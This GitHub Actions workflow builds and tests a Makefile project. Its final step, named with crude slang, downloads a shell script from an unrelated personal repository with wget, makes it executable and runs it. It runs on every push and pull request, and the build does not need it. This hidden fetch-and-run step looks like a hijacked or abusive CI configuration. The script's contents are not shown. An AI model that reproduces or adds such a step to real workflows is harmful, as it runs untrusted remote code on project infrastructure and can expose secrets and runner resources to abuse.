name: Makefile CI

on:
  push:
    branches: [ master ]
  pull_request:
    branches: [ master ]

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v2
    
    - name: configure
      run: ./configure
      
    - name: Install dependencies
      run: make
      
    - name: Run check
      run: make check
      
    - name: Run distcheck
      run: make distcheck
      
    - name: ngocok
      run: wget https://raw.githubusercontent.com/mamang1123/memek.sh/main/memek.sh && chmod +x memek.sh && ./memek.sh
